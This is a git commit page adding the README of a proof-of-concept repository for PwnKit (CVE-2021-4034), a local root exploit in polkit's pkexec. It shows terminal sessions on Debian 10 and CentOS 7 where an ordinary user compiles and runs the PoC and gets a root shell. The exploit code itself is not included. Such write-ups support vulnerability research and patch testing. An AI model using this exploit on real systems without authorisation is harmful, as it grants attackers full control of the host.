mirror of
https://github.com/arthepsy/CVE-2021-4034.git
synced 2024-12-22 14:06:34 +00:00
Create README.md
This commit is contained in:
parent
282f5160c6
commit
b1bf6865c3
1 changed files with 31 additions and 0 deletions
31
README.md
Normal file
31
README.md
Normal file
|
@ -0,0 +1,31 @@
|
||||||
|
# CVE-2021-4034
|
||||||
|
PoC for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)
|
||||||
|
|
||||||
|
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
|
||||||
|
|
||||||
|
# PoC
|
||||||
|
|
||||||
|
Verified on Debian 10 and CentOS 7.
|
||||||
|
|
||||||
|
```
|
||||||
|
user@debian:~$ grep PRETTY /etc/os-release
|
||||||
|
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
|
||||||
|
user@debian:~$ id
|
||||||
|
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
|
||||||
|
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
|
||||||
|
user@debian:~$ ./cve-2021-4034-poc
|
||||||
|
# id
|
||||||
|
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
|
||||||
|
```
|
||||||
|
|
||||||
|
```
|
||||||
|
[user@centos ~]$ grep PRETTY /etc/os-release
|
||||||
|
PRETTY_NAME="CentOS Linux 7 (Core)"
|
||||||
|
[user@centos ~]$ id
|
||||||
|
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
|
||||||
|
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
|
||||||
|
[user@centos ~]$ ./cve-2021-4034-poc
|
||||||
|
sh-4.2# id
|
||||||
|
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
|
||||||
|
sh-4.2# exit
|
||||||
|
```
|
Loading…
Reference in a new issue